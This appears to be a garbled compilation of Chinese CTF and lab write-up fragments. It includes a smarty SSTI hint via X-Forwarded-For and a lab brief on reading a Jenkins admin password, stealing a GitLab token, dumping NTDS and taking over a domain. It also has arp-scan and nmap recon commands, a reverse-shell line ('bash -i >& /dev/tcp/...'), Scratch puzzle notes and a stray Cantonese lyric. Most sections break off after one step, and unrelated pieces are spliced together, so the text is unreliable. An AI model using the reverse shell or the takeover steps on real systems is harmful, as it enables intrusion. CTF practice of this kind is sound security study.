题目来源：CISCN-2019 华东南-Web11

WriteUp

观察首页，在 footer 发现到是 PHP 的 smarty 模板引擎

随手在 X-Forwarded-For 写入一个 IP，可以看到 Current IP 显示了我们写入的 IP，于是可以判断他是通过 X-Forwarded-For 来获取 IP 的，猜测存在 SSTI 漏洞。

获取靶机信息

题目给出 IP: 39.103.138.101

题目描述

• 第一关：请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。

• 第二关：管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

• 第三关：攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。

• 第四关：尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

题目来源：2022 网鼎杯半决赛

获取靶机信息

题目给出 IP：39.101.176.24

在首页中点击发现另一个页面 IP：39.98.202.121

题目来源：EMPIRE: BREAKOUT

获取靶机信息

靶机的 ip 地址为 192.168.7.127

arp-scan -l

反弹 Shell 命令大全，收录自Reverse-shell-cheatsheet

Bash TCP

Victim

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

题目来源：JANGOW: 1.0.1

获取靶机信息

获得 ip 地址为 192.168.7.201

arp-scan -l

题目来源：THE PLANETS: EARTH

获取靶机信息

arp-scan -l
nmap -sP 192.168.7.0/24

佢哋啱啱升級咗安全系統 - 今次用唔到密碼鍵盤去打正確嘅密碼啦！
Scratch: https://scratch.mit.edu/projects/755732653/

0x01 分析

查看源码，找到计算密码的函数，发现是通过memory和input计算后匹配character中的内容来计算 flag

千層地獄？我選擇千層迷宮。

網頁: https://scratch.mit.edu/projects/919957145/

0x01 分析

同样是来到源码部分，看到每局都是从绿点走到红点，走过的路径是 seq ，在完成一张地图后通过计算上下左右的次数，计算出一个数放进 result 中

使用 result 计算出 flag

練功練功
好過喺度亂想一通
講到天花龍鳳
帶人遊西北東
I'm so turn off 唔該你練功練功
坐而言起而行練練功

你已經玩過密碼遊戲了吧？來玩旗幟遊戲！

0x01 分析

The flag game 特别像 Password-Game